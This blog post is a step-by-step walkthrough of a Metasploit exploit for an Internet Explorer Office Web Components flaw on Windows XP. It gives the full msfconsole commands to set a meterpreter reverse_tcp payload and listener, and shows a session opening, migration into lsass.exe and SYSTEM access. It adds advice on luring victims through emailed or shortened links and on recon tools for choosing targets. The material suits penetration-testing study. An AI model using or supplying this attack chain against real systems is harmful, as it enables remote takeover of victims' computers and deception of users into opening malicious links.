HD Moore has released a second IE 0 day Metasploit Exploit Module in the past 2 weeks. The Office Web Component Exploit in Metasploit was committed to the Dev 3.3 SVN and will attack the vulnerability on the following platforms:

  • Windows XP SP0 to SP3 with IE6 or IE7 with Office XP or Office 2003 Installed

The exploit targets a specific spreadsheet component in ActiveX. The code for the whole exploit can be seen in trac.metasploit.com

To use the exploit we must load it in msfconsole, for this example the console will be ran as root since we want to use port 80 for the exploit handler to listen on. This will ensure success by using the default port 80 for directed attacks as there might be filtering on the target network. We set the exploit and payload:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf > use exploit/windows/browser/owc_spreadsheet_msdso
msf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

Know we take a look at the other options we have available for this module and we change the port to listen on to 80:

msf exploit(owc_spreadsheet_msdso) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.158    yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0


msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80
SRVPORT => 80

We know launch the exploit and make sure no errors are reported:

msf exploit(owc_spreadsheet_msdso) > exploit
[*] Exploit running as background job.
msf exploit(owc_spreadsheet_msdso) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/4fwmCRO
[*]  Local IP: http://192.168.1.158:80/4fwmCRO
[*] Server started.

We can now send and email, tweet with URL shortened or any other method od delivery of the address to the target. Once the exploit is run we must quickly migrate off the process since IE will hang or a user might kill the process destroying our shell:

[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)

msf exploit(owc_spreadsheet_msdso) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: iexplore.exe (1328)
[*] New server process: lsass.exe (684)
meterpreter >
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

 

This exploit should be launched after the enumeration of the target network, preferably using metadata on documents using tools like FOCA or Metagoofil to detect the Office and OS to create the files and with this information target the attack.

UPDATE: Removed the section where we covered how the code obfuscation worked since HD updated the exploit and mentioned that is was having problems with the encoding. Changeset for the code

About the author